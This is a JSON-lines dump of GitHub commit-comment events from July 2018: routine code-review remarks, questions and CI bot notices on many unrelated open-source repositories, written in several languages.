{"id":"7949701732","type":"CommitCommentEvent","actor":{"login":"mahi2406"},"repo":{"name":"mahi2406/vanitygen-plus"},"payload":{"comment":{"id":29670220,"position":null,"line":null,"path":null,"commit_id":"ac9905ec6a28fb23d4977f371299b6c7a2ab790b","created_at":"2018-07-11T12:20:28Z","updated_at":"2018-07-11T12:20:28Z","author_association":"OWNER","body":"by showing number of loaded patterns from file taking long time so no need anymore and better to remove."}},"created_at":"2018-07-11T12:20:28Z"}
{"id":"7949704746","type":"CommitCommentEvent","actor":{"login":"nl8590687"},"repo":{"name":"nl8590687/ASRT_SpeechRecognition"},"payload":{"comment":{"id":29670229,"position":null,"line":null,"path":null,"commit_id":"9d40bb7f242f99933ebaedb2c0dc08f38c8fb207","created_at":"2018-07-11T12:21:05Z","updated_at":"2018-07-11T12:21:05Z","author_association":"OWNER","body":"@qq594495953 \r\n那就把时移减小一点窗长也减小一点试试，现在是10ms和25ms，可以试试5ms和20ms\r\n在general_function里面"}},"created_at":"2018-07-11T12:21:05Z"}
{"id":"7949705257","type":"CommitCommentEvent","actor":{"login":"daschw"},"repo":{"name":"JuliaPlots/Plots.jl"},"payload":{"comment":{"id":29670230,"position":null,"line":null,"path":null,"commit_id":"e92e832258ad5efd4b04c90c1a7a69ffb470c9f3","created_at":"2018-07-11T12:21:12Z","updated_at":"2018-07-11T12:21:12Z","author_association":"MEMBER","body":"Thanks a lot for the hint @nico202! Do you have any idea what could be used instead of `Pkg.installed` here?"}},"created_at":"2018-07-11T12:21:12Z"}
{"id":"7949707691","type":"CommitCommentEvent","actor":{"login":"MacOSO"},"repo":{"name":"Puzovoz/eventhub-backend-js"},"payload":{"comment":{"id":29670242,"position":18,"line":18,"path":"package.json","commit_id":"99724d18ec4d4578293847e6a3d36bfb3db2c197","created_at":"2018-07-11T12:21:40Z","updated_at":"2018-07-11T12:21:40Z","author_association":"NONE","body":"I recommend using the library `cors`.  \r\n[CORS on MDN web docs](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)"}},"created_at":"2018-07-11T12:21:40Z"}
{"id":"7949713968","type":"CommitCommentEvent","actor":{"login":"rupansh"},"repo":{"name":"rupansh/clone_trees"},"payload":{"comment":{"id":29670254,"position":4,"line":2,"path":"README.md","commit_id":"141bc5707814b0720399fa49b004dcdc853bc02f","created_at":"2018-07-11T12:22:57Z","updated_at":"2018-07-11T12:22:57Z","author_association":"OWNER","body":"Okay!"}},"created_at":"2018-07-11T12:22:57Z"}
{"id":"7949745296","type":"CommitCommentEvent","actor":{"login":"Bujing32"},"repo":{"name":"MetricsNJU/Metrics_2018"},"payload":{"comment":{"id":29670331,"position":null,"line":null,"path":null,"commit_id":"8c22e07b8327e0ddda847463f646440ab867dbfc","created_at":"2018-07-11T12:29:08Z","updated_at":"2018-07-11T12:29:08Z","author_association":"CONTRIBUTOR","body":"Thank you!  I will try my best to do it.\n\n\n| |\n卜京\n邮箱：15122994376@163.com\n|\n\n签名由 网易邮箱大师 定制\n\nOn 07/11/2018 18:03, Frank Qu wrote:\n\nWell done! You are awsome. And maybe we could make the web more beautiful and friendly in the next move.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-11T12:29:08Z"}
{"id":"7949746743","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29670338,"position":11,"line":11,"path":"lib/elixir/lib/dict.ex","commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T12:29:25Z","updated_at":"2018-07-11T12:29:25Z","author_association":"MEMBER","body":"Shouldn't we use backtics as in any doc string?"}},"created_at":"2018-07-11T12:29:25Z"}
{"id":"7949747899","type":"CommitCommentEvent","actor":{"login":"sjyu1988"},"repo":{"name":"binchensun/suncasa"},"payload":{"comment":{"id":29670339,"position":null,"line":null,"path":null,"commit_id":"5ff6d9958ba6abfbd7451146baeadc6dd6119ec1","created_at":"2018-07-11T12:29:39Z","updated_at":"2018-07-11T12:29:39Z","author_association":"CONTRIBUTOR","body":"Hi Bin,\r\n\r\nI'm not sure whether \"batch=l\" in the cmdstr is a typo or not.\r\nShould it be \"batch=1\"?\r\n\r\n-Sijie"}},"created_at":"2018-07-11T12:29:39Z"}
{"id":"7949749386","type":"CommitCommentEvent","actor":{"login":"smedilol"},"repo":{"name":"TypeCobolTeam/TypeCobol"},"payload":{"comment":{"id":29670348,"position":100,"line":659,"path":"TypeCobol/Compiler/CodeModel/SymbolTable.cs","commit_id":"7449edacde2aec210c587178590ba60a5d55f188","created_at":"2018-07-11T12:29:55Z","updated_at":"2018-07-11T12:29:55Z","author_association":"MEMBER","body":"`type2.GetChildren<DataDefinition>(name, true)` is the method that is slowing GetCustomTypesSubordinatesNamed\r\nSo your refactor must get rid of it in SymbolTable."}},"created_at":"2018-07-11T12:29:55Z"}
{"id":"7949749616","type":"CommitCommentEvent","actor":{"login":"Acerplatanoides1"},"repo":{"name":"Acerplatanoides1/Learning-MicMac"},"payload":{"comment":{"id":29670349,"position":null,"line":null,"path":null,"commit_id":"9b8ccf66e2136340284340c9757c92a9eb807e35","created_at":"2018-07-11T12:29:58Z","updated_at":"2018-07-11T12:29:58Z","author_association":"OWNER","body":"Example dataset for 3rd part of use cases from Learning MicMac tutorial"}},"created_at":"2018-07-11T12:29:58Z"}
{"id":"7949753737","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29670355,"position":11,"line":11,"path":"lib/elixir/lib/dict.ex","commit_id":"43f80d382b22f03fe021206b234abdabb91b49da","created_at":"2018-07-11T12:30:43Z","updated_at":"2018-07-11T12:30:43Z","author_association":"MEMBER","body":"This is a good question but it would be inconsistent with `@deprecated` which is shown in other media besides docs."}},"created_at":"2018-07-11T12:30:43Z"}
{"id":"7949758860","type":"CommitCommentEvent","actor":{"login":"smedilol"},"repo":{"name":"TypeCobolTeam/TypeCobol"},"payload":{"comment":{"id":29670364,"position":14,"line":448,"path":"TypeCobol/Compiler/Nodes/Node.cs","commit_id":"7449edacde2aec210c587178590ba60a5d55f188","created_at":"2018-07-11T12:31:39Z","updated_at":"2018-07-11T12:31:39Z","author_association":"MEMBER","body":"`The usage of `as` here is wrong.\r\n`as`  means your are not use if the cast will succeed and you have to test the result (!=null).\r\n"}},"created_at":"2018-07-11T12:31:39Z"}
{"id":"7949772743","type":"CommitCommentEvent","actor":{"login":"Dseals82"},"repo":{"name":"driggl/rails-api-complete-guide"},"payload":{"comment":{"id":29670401,"position":null,"line":null,"path":null,"commit_id":"525ddcd129253032af81f049a1b369b110c900a2","created_at":"2018-07-11T12:34:20Z","updated_at":"2018-07-11T12:34:20Z","author_association":"NONE","body":"how was we supposed to guess this?"}},"created_at":"2018-07-11T12:34:20Z"}
{"id":"7949779737","type":"CommitCommentEvent","actor":{"login":"thiagoarrais"},"repo":{"name":"thiagoarrais/babel"},"payload":{"comment":{"id":29670413,"position":5,"line":14,"path":"packages/babel-preset-env/data/shipped-proposals.js","commit_id":"df2c09f48079a1fd20fb638a03d6eb6d683f5d8b","created_at":"2018-07-11T12:35:36Z","updated_at":"2018-07-11T12:35:36Z","author_association":"OWNER","body":"considered that. but I wasn't really sure what removing it from this file meant. it has to do with the [shippedProposals](https://babeljs.io/docs/en/next/babel-preset-env.html#shippedproposals) flag of the env preset, right?"}},"created_at":"2018-07-11T12:35:36Z"}
{"id":"7949782217","type":"CommitCommentEvent","actor":{"login":"beca-bakari"},"repo":{"name":"beca-bakari/beca-bakari.github.io"},"payload":{"comment":{"id":29670416,"position":null,"line":null,"path":null,"commit_id":"63c408ea04a6634eb9db6dded7548c381f467c0d","created_at":"2018-07-11T12:36:04Z","updated_at":"2018-07-11T12:36:04Z","author_association":"OWNER","body":"y"}},"created_at":"2018-07-11T12:36:04Z"}
{"id":"7949783932","type":"CommitCommentEvent","actor":{"login":"easyly471"},"repo":{"name":"easyly471/project_zero"},"payload":{"comment":{"id":29670420,"position":null,"line":null,"path":null,"commit_id":"b3dc61a2335275a21b563ebf820daf3e579f36b6","created_at":"2018-07-11T12:36:25Z","updated_at":"2018-07-11T12:36:25Z","author_association":"OWNER","body":"Dizin ve dosya sistemi tamamen degsiti sozlukler bok yesin"}},"created_at":"2018-07-11T12:36:25Z"}
{"id":"7949786150","type":"CommitCommentEvent","actor":{"login":"federicobond"},"repo":{"name":"CoNexDat/complexnets"},"payload":{"comment":{"id":29670423,"position":2,"line":1,"path":"CMakeLists.txt","commit_id":"a6013b9ff73a6bf6755212cdc1c8825ec1eb338e","created_at":"2018-07-11T12:36:49Z","updated_at":"2018-07-11T12:36:49Z","author_association":"COLLABORATOR","body":"@MatiasComercio was this a typo or the minimum CMake version was intentionally downgraded?"}},"created_at":"2018-07-11T12:36:49Z"}
{"id":"7949790250","type":"CommitCommentEvent","actor":{"login":"jacksonbrandao"},"repo":{"name":"rodmatola/robot-framework-blog-concrete"},"payload":{"comment":{"id":29670433,"position":null,"line":null,"path":null,"commit_id":"1b8663560d3c585d82c528eb1a1782976b3742d5","created_at":"2018-07-11T12:37:36Z","updated_at":"2018-07-11T12:37:36Z","author_association":"NONE","body":"Ao executar o test da esse erro abaixo:\r\n\r\n(venv) jackson@avell:~/PycharmProjects/projetinho/venv/Test$ robot Test.robot\r\n[ ERROR ] Error in file '/home/jackson/PycharmProjects/projetinho/venv/Test/Test.robot': Resource file 'Test/page.robot' does not exist.\r\n==============================================================================\r\nTest :: Test for Internet > Dynamic DNS page.                                 \r\n==============================================================================\r\nCenário: Buscar por Robot Framework no Google e entrar na página :... | FAIL |\r\nNo keyword with name 'Abrir o Chrome na página <http://www.google.com.br>' found.\r\n------------------------------------------------------------------------------\r\nTest :: Test for Internet > Dynamic DNS page.                         | FAIL |\r\n1 critical test, 0 passed, 1 failed\r\n1 test total, 0 passed, 1 failed\r\n==============================================================================\r\nOutput:  /home/jackson/PycharmProjects/projetinho/venv/Test/output.xml\r\nLog:     /home/jackson/PycharmProjects/projetinho/venv/Test/log.html\r\nReport:  /home/jackson/PycharmProjects/projetinho/venv/Test/report.html\r\n(venv) jackson@avell:~/PycharmProjects/projetinho/venv/Test$ \r\n"}},"created_at":"2018-07-11T12:37:36Z"}
{"id":"7949790300","type":"CommitCommentEvent","actor":{"login":"VandaRos"},"repo":{"name":"VandaRos/Iris-classification"},"payload":{"comment":{"id":29670434,"position":null,"line":null,"path":null,"commit_id":"7f832219aa5e027ac4089f6be7bfec1a39416f8c","created_at":"2018-07-11T12:37:36Z","updated_at":"2018-07-11T12:37:36Z","author_association":"OWNER","body":"Image Folder"}},"created_at":"2018-07-11T12:37:36Z"}
{"id":"7949790362","type":"CommitCommentEvent","actor":{"login":"andresilvans"},"repo":{"name":"andresilvans/Linux"},"payload":{"comment":{"id":29670435,"position":null,"line":null,"path":null,"commit_id":"95334fdd83b86b9e4d239cba3b916b882cc58750","created_at":"2018-07-11T12:37:37Z","updated_at":"2018-07-11T12:37:37Z","author_association":"OWNER","body":"俄罗斯方块小游戏"}},"created_at":"2018-07-11T12:37:37Z"}
{"id":"7949795801","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"Traceur759/eventlet"},"payload":{"comment":{"id":29670449,"position":14,"line":62,"path":"tests/debug_test.py","commit_id":"d7bd72f7ab60423ab7dd67d47f8b9bd2fe425b75","created_at":"2018-07-11T12:38:39Z","updated_at":"2018-07-11T12:38:39Z","author_association":"NONE","body":"won't this break older pythons?"}},"created_at":"2018-07-11T12:38:39Z"}
{"id":"7949797376","type":"CommitCommentEvent","actor":{"login":"smbo999"},"repo":{"name":"rsmith013/ral_eew"},"payload":{"comment":{"id":29670455,"position":null,"line":null,"path":null,"commit_id":"46799f914353e3d425b7dc861e10a798441dcb1b","created_at":"2018-07-11T12:38:58Z","updated_at":"2018-07-11T12:38:58Z","author_association":"COLLABORATOR","body":"not a clue how this works  but k\r\n"}},"created_at":"2018-07-11T12:38:58Z"}
{"id":"7949800057","type":"CommitCommentEvent","actor":{"login":"binchensun"},"repo":{"name":"binchensun/suncasa"},"payload":{"comment":{"id":29670469,"position":null,"line":null,"path":null,"commit_id":"5ff6d9958ba6abfbd7451146baeadc6dd6119ec1","created_at":"2018-07-11T12:39:27Z","updated_at":"2018-07-11T12:39:27Z","author_association":"OWNER","body":"Thanks for spotting that. I compare to instructions on this page:\nhttps://ssd.jpl.nasa.gov/horizons_batch.cgi, it should be\n\"1\". Interestingly this returns no error (I guess anything other than 0 is\nconsidered 1?). Just fixed it on baozi and github.\n\n-Bin\n\nOn Wed, Jul 11, 2018 at 8:29 AM Sijie Yu <notifications@github.com> wrote:\n\n> Hi Bin,\n>\n> I'm not sure whether \"batch=l\" in the cmdstr is a typo or not.\n> Should it be \"batch=1\"?\n>\n> -Sijie\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/binchensun/suncasa/commit/5ff6d9958ba6abfbd7451146baeadc6dd6119ec1#commitcomment-29670339>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHrMpscOleSd9MinXzh3UfcSGKyO12m_ks5uFe-zgaJpZM4VLC7N>\n> .\n>\n\n\n-- \nDr. Bin Chen\nAssistant Professor of Physics\nCenter for Solar-Terrestrial Research\nNew Jersey Institute of Technology\n\n101 Tiernan Hall\n323 Dr. Martin Luther King Blvd, Newark, NJ 07102\n(973) 596-3565\nbin.chen@njit.edu\nhttps://web.njit.edu/~binchen\n"}},"created_at":"2018-07-11T12:39:27Z"}
{"id":"7949802537","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"dframe/database"},"payload":{"comment":{"id":29670473,"position":5,"line":12,"path":"src/PdoWrapper.php","commit_id":"827145234f6c46db96b9c96af9746ac6116601a2","created_at":"2018-07-11T12:39:55Z","updated_at":"2018-07-11T12:39:55Z","author_association":"CONTRIBUTOR","body":"Using `use PDO` is fine and it's necessary to add the `\\` before the `PDO`."}},"created_at":"2018-07-11T12:39:55Z"}
{"id":"7949810397","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29670487,"position":17,"line":17,"path":"train.rb","commit_id":"72a1d04f1e7ee43bf852569ed52409d1eb1b409c","created_at":"2018-07-11T12:41:25Z","updated_at":"2018-07-11T12:41:25Z","author_association":"NONE","body":"\"reset\" - это \"перезапустить\" или \"заново установить\"\r\nздесь скорее `decrease_speed`"}},"created_at":"2018-07-11T12:41:25Z"}
{"id":"7949810431","type":"CommitCommentEvent","actor":{"login":"ondrej-fabry"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":29670488,"position":null,"line":null,"path":null,"commit_id":"e243d242d750f19cd1c3aefa7da1ad238f21502e","created_at":"2018-07-11T12:41:25Z","updated_at":"2018-07-11T12:41:25Z","author_association":"NONE","body":"@kargakis It seems following comment need similar fix as well: \r\nhttps://github.com/golang/go/blob/master/src/reflect/type.go#L576-L580"}},"created_at":"2018-07-11T12:41:25Z"}
{"id":"7949812558","type":"CommitCommentEvent","actor":{"login":"sjyu1988"},"repo":{"name":"binchensun/suncasa"},"payload":{"comment":{"id":29670494,"position":null,"line":null,"path":null,"commit_id":"5ff6d9958ba6abfbd7451146baeadc6dd6119ec1","created_at":"2018-07-11T12:41:49Z","updated_at":"2018-07-11T12:41:49Z","author_association":"CONTRIBUTOR","body":"I guess so. Thanks.\r\n-Sijie"}},"created_at":"2018-07-11T12:41:49Z"}
{"id":"7949814473","type":"CommitCommentEvent","actor":{"login":"gedge"},"repo":{"name":"ONSdigital/go-ns"},"payload":{"comment":{"id":29670501,"position":12,"line":12,"path":"identity/helper.go","commit_id":"63e825d7b6424f7e7f8205fbf9a0c9beb639f87f","created_at":"2018-07-11T12:42:12Z","updated_at":"2018-07-11T12:42:12Z","author_association":"CONTRIBUTOR","body":"`... = common.Params{` surely? 😄 \r\n"}},"created_at":"2018-07-11T12:42:12Z"}
{"id":"7949815314","type":"CommitCommentEvent","actor":{"login":"rodmatola"},"repo":{"name":"rodmatola/robot-framework-blog-concrete"},"payload":{"comment":{"id":29670505,"position":null,"line":null,"path":null,"commit_id":"1b8663560d3c585d82c528eb1a1782976b3742d5","created_at":"2018-07-11T12:42:21Z","updated_at":"2018-07-11T12:42:21Z","author_association":"OWNER","body":"o caminho para page.robot deve estar errado e tem alguma coisa errada com seu código na keyword mencionada. Tente resolver na ordem que aparecem os erros"}},"created_at":"2018-07-11T12:42:21Z"}
{"id":"7949816074","type":"CommitCommentEvent","actor":{"login":"bruno-garcia"},"repo":{"name":"jviolas/raven-csharp"},"payload":{"comment":{"id":29670509,"position":23,"line":82,"path":"src/tests/SharpRaven.UnitTests/Data/SentryStacktraceTests.cs","commit_id":"ec3f19a24d964aef496c778c89fe39afd171fcb5","created_at":"2018-07-11T12:42:30Z","updated_at":"2018-07-11T12:42:30Z","author_association":"NONE","body":"here you could use: `nameof(Constructor_ExceptionWithoutFrames_CaptureFrames)`"}},"created_at":"2018-07-11T12:42:30Z"}
{"id":"7949817064","type":"CommitCommentEvent","actor":{"login":"constroy"},"repo":{"name":"chffy/chftek"},"payload":{"comment":{"id":29670513,"position":28,"line":28,"path":"cpp/src/thread_pool.h","commit_id":"b2077cc4044a9c0abc69b030c66d3605a8f8ff7d","created_at":"2018-07-11T12:42:41Z","updated_at":"2018-07-11T12:42:41Z","author_association":"NONE","body":"@chffy \r\n`isStop` declared here, but `stop` used elsewhere.\r\nI guess it is just a typo, right?"}},"created_at":"2018-07-11T12:42:41Z"}
{"id":"7949819706","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29670525,"position":130,"line":114,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T12:43:13Z","updated_at":"2018-07-11T12:43:13Z","author_association":"OWNER","body":"Sorry, I didn't read your comment from 8 days ago well enough. You are talking about different contracts. Why is it important to account for hash collisions over different contracts ? Storage is per contract and there is no way that one contract might refer to the storage of another contract (as long as they are not linked). The only thing that is shared between different instances of the same contract, are the accounts. Why is it an issue if I have two similar hashes that are used in multiple instances of contracts ?\r\n"}},"created_at":"2018-07-11T12:43:13Z"}
{"id":"7949823803","type":"CommitCommentEvent","actor":{"login":"mahi2406"},"repo":{"name":"exploitagency/vanitygen-plus"},"payload":{"comment":{"id":29670534,"position":null,"line":null,"path":null,"commit_id":"b3c90c1040b56c4508fed837652855dc0e74f468","created_at":"2018-07-11T12:43:58Z","updated_at":"2018-07-11T12:43:58Z","author_association":"NONE","body":"by showing number of loaded patterns from file its taking long time to start the program so its better to remove showing process because.\r\ntime taking to start program while showing number of loaded patterns approx 5 to 8 sec.\r\ntime taking without showing number of loaded patterns approx 2 to 3 sec.\r\n\r\nso its better to remove showing number of loaded patterns."}},"created_at":"2018-07-11T12:43:58Z"}
{"id":"7949824840","type":"CommitCommentEvent","actor":{"login":"pkay09"},"repo":{"name":"pkay09/Newbie"},"payload":{"comment":{"id":29670537,"position":null,"line":null,"path":null,"commit_id":"7be564c4b1a45f87e8a85c7d0cf4e97aed8b5c57","created_at":"2018-07-11T12:44:10Z","updated_at":"2018-07-11T12:44:10Z","author_association":"OWNER","body":"Created readme file"}},"created_at":"2018-07-11T12:44:10Z"}
{"id":"7949828237","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/datum"},"payload":{"comment":{"id":29670546,"position":null,"line":null,"path":null,"commit_id":"9a67a501703ed347ef3e590ca709b14cc9c20c62","created_at":"2018-07-11T12:44:46Z","updated_at":"2018-07-11T12:44:46Z","author_association":"COLLABORATOR","body":"Puzzle `314-e6e34cf3` disappeared from [`xsl-test/templates/par.xsl`](https://github.com/zerocracy/datum/blob/master/xsl-test/templates/par.xsl), that's why I closed #315. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-11T12:44:46Z"}
{"id":"7949830370","type":"CommitCommentEvent","actor":{"login":"bruno-garcia"},"repo":{"name":"jviolas/raven-csharp"},"payload":{"comment":{"id":29670550,"position":27,"line":68,"path":"src/app/SharpRaven/Data/SentryStacktrace.cs","commit_id":"ec3f19a24d964aef496c778c89fe39afd171fcb5","created_at":"2018-07-11T12:45:12Z","updated_at":"2018-07-11T12:45:12Z","author_association":"NONE","body":"Could you move the logic for skipping it in case of `force` only inside that block?\r\nSince having the stacktrace is the 99% of the case, it would avoid going through this SkipWhile."}},"created_at":"2018-07-11T12:45:12Z"}
{"id":"7949833258","type":"CommitCommentEvent","actor":{"login":"bruno-garcia"},"repo":{"name":"jviolas/raven-csharp"},"payload":{"comment":{"id":29670558,"position":18,"line":61,"path":"src/app/SharpRaven/Data/SentryStacktrace.cs","commit_id":"ec3f19a24d964aef496c778c89fe39afd171fcb5","created_at":"2018-07-11T12:45:44Z","updated_at":"2018-07-11T12:45:44Z","author_association":"NONE","body":"Just add you `.SkipWhile(f => f.GetMethod().Module.Name == \"SharpRaven.dll\")` here"}},"created_at":"2018-07-11T12:45:44Z"}
{"id":"7949836127","type":"CommitCommentEvent","actor":{"login":"brc0625"},"repo":{"name":"test1873/Test_Repository"},"payload":{"comment":{"id":29670562,"position":null,"line":null,"path":null,"commit_id":"6a083e7b7fcc3c6f68c2600b62e9171979ee38d4","created_at":"2018-07-11T12:46:16Z","updated_at":"2018-07-11T12:46:16Z","author_association":"CONTRIBUTOR","body":"add test cases"}},"created_at":"2018-07-11T12:46:16Z"}
{"id":"7949837354","type":"CommitCommentEvent","actor":{"login":"zharkov-php"},"repo":{"name":"zharkov-php/Laravel-elvisdnNew"},"payload":{"comment":{"id":29670563,"position":null,"line":null,"path":null,"commit_id":"646731af9ec1ce66f40e1b0a737717d82c839ca0","created_at":"2018-07-11T12:46:29Z","updated_at":"2018-07-11T12:46:29Z","author_association":"OWNER","body":"https://github.com/davejamesmiller/laravel-breadcrumbs\r\n\r\ncomposer require davejamesmiller/laravel-breadcrumbs:5.x"}},"created_at":"2018-07-11T12:46:29Z"}
{"id":"7949842163","type":"CommitCommentEvent","actor":{"login":"EliasAHH"},"repo":{"name":"EliasAHH/pong"},"payload":{"comment":{"id":29670570,"position":null,"line":null,"path":null,"commit_id":"056d0f057ddcf62229aa02708e8a24d70a3bec9a","created_at":"2018-07-11T12:47:22Z","updated_at":"2018-07-11T12:47:22Z","author_association":"OWNER","body":"deleting "}},"created_at":"2018-07-11T12:47:22Z"}
{"id":"7949855307","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29670590,"position":null,"line":null,"path":null,"commit_id":"efb4db4795b58cd387cfdd74e0d67b9a36078932","created_at":"2018-07-11T12:49:43Z","updated_at":"2018-07-11T12:49:43Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 720](https://travis-ci.org/per1234/arduino-ci-script/builds/402639250) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00720-001-tsv"}},"created_at":"2018-07-11T12:49:43Z"}
{"id":"7949855825","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29670591,"position":null,"line":null,"path":null,"commit_id":"efb4db4795b58cd387cfdd74e0d67b9a36078932","created_at":"2018-07-11T12:49:48Z","updated_at":"2018-07-11T12:49:48Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 720](https://travis-ci.org/per1234/arduino-ci-script/builds/402639250) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00720"}},"created_at":"2018-07-11T12:49:48Z"}
{"id":"7949855923","type":"CommitCommentEvent","actor":{"login":"SamayeeDhungel"},"repo":{"name":"SamayeeDhungel/Desktop-first-repo"},"payload":{"comment":{"id":29670592,"position":null,"line":null,"path":null,"commit_id":"bb8ff081409efdc2fca4e20629130f2ca841094d","created_at":"2018-07-11T12:49:49Z","updated_at":"2018-07-11T12:49:49Z","author_association":"OWNER","body":"First commit ever "}},"created_at":"2018-07-11T12:49:49Z"}
{"id":"7949860131","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29670598,"position":null,"line":null,"path":null,"commit_id":"e80656c48b015cc7410e7c7e976766b65d173b8e","created_at":"2018-07-11T12:50:34Z","updated_at":"2018-07-11T12:50:34Z","author_association":"NONE","body":"Use `clang-format` to indent."}},"created_at":"2018-07-11T12:50:34Z"}
{"id":"7949863815","type":"CommitCommentEvent","actor":{"login":"jdakka"},"repo":{"name":"radical-cybertools/htbac"},"payload":{"comment":{"id":29670602,"position":20,"line":282,"path":"htbac/simulation.py","commit_id":"cedd6f9f0150917f3a4efe60927b7225ea198d3e","created_at":"2018-07-11T12:51:17Z","updated_at":"2018-07-11T12:51:17Z","author_association":"COLLABORATOR","body":"These are attributes that are specific to an internal project that involves a type of task scheduler, hence why this is a separate branch. "}},"created_at":"2018-07-11T12:51:17Z"}
{"id":"7949866390","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29670606,"position":5,"line":33,"path":"Makefile","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-11T12:51:45Z","updated_at":"2018-07-11T12:51:45Z","author_association":"NONE","body":"You shall submit another pull request for SSE-specific changes."}},"created_at":"2018-07-11T12:51:45Z"}
{"id":"7949867463","type":"CommitCommentEvent","actor":{"login":"stefan2904"},"repo":{"name":"romansil/dotfiles"},"payload":{"comment":{"id":29670609,"position":null,"line":null,"path":null,"commit_id":"a50f2fa6bcfe11ec0acf2bc302f493e83d3d05f9","created_at":"2018-07-11T12:51:56Z","updated_at":"2018-07-11T12:51:56Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-11T12:51:56Z"}
{"id":"7949869592","type":"CommitCommentEvent","actor":{"login":"Kouxudong"},"repo":{"name":"Kouxudong/IFE"},"payload":{"comment":{"id":29670615,"position":null,"line":null,"path":null,"commit_id":"3ea99fe6e2af250370670543649b8972f25dd6c3","created_at":"2018-07-11T12:52:20Z","updated_at":"2018-07-11T12:52:20Z","author_association":"OWNER","body":"IFR"}},"created_at":"2018-07-11T12:52:20Z"}
{"id":"7949875788","type":"CommitCommentEvent","actor":{"login":"gedge"},"repo":{"name":"ONSdigital/go-ns"},"payload":{"comment":{"id":29670630,"position":20,"line":20,"path":"identity/helper.go","commit_id":"63e825d7b6424f7e7f8205fbf9a0c9beb639f87f","created_at":"2018-07-11T12:53:28Z","updated_at":"2018-07-11T12:53:28Z","author_association":"CONTRIBUTOR","body":"here (see below)"}},"created_at":"2018-07-11T12:53:28Z"}
{"id":"7949876234","type":"CommitCommentEvent","actor":{"login":"gedge"},"repo":{"name":"ONSdigital/go-ns"},"payload":{"comment":{"id":29670631,"position":21,"line":21,"path":"identity/helper.go","commit_id":"63e825d7b6424f7e7f8205fbf9a0c9beb639f87f","created_at":"2018-07-11T12:53:34Z","updated_at":"2018-07-11T12:53:34Z","author_association":"CONTRIBUTOR","body":"here (see below)"}},"created_at":"2018-07-11T12:53:34Z"}
{"id":"7949878274","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29670635,"position":42,"line":133,"path":"Makefile","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-11T12:53:57Z","updated_at":"2018-07-11T12:53:57Z","author_association":"NONE","body":"Don't do that. You can always build `dcurl` with `make VERBOSE=1` in order to get detailed build messages."}},"created_at":"2018-07-11T12:53:57Z"}
{"id":"7949881193","type":"CommitCommentEvent","actor":{"login":"bartavelle"},"repo":{"name":"bartavelle/language-puppet"},"payload":{"comment":{"id":29670639,"position":5,"line":102,"path":"src/Puppet/Runner/Preferences.hs","commit_id":"e58a79df58acb218d75b32b5f028053808489c82","created_at":"2018-07-11T12:54:29Z","updated_at":"2018-07-11T12:54:29Z","author_association":"OWNER","body":"Hum, perhaps yes!"}},"created_at":"2018-07-11T12:54:29Z"}
{"id":"7949881969","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29670640,"position":5,"line":91,"path":"src/converter.c","commit_id":"0100646d2d101bb7142e33996c4ffe6ed6a53c49","created_at":"2018-07-11T12:54:37Z","updated_at":"2018-07-11T12:54:37Z","author_association":"NONE","body":"Don't do that. Functions with suffix \"_aj\" do not really make sense."}},"created_at":"2018-07-11T12:54:37Z"}
{"id":"7949882644","type":"CommitCommentEvent","actor":{"login":"gedge"},"repo":{"name":"ONSdigital/go-ns"},"payload":{"comment":{"id":29670643,"position":46,"line":46,"path":"identity/helper.go","commit_id":"63e825d7b6424f7e7f8205fbf9a0c9beb639f87f","created_at":"2018-07-11T12:54:46Z","updated_at":"2018-07-11T12:54:46Z","author_association":"CONTRIBUTOR","body":"how about adding `else { auditParams[pathValue] = splitPath[i+1] }` (i.e. default to `pathValue` if that key doesn't exist in the map - and then you can remove the 2 key-value pairs above where they match (and future expansion defaults to using the existing `pathValue` and doesn't go undetected)?"}},"created_at":"2018-07-11T12:54:46Z"}
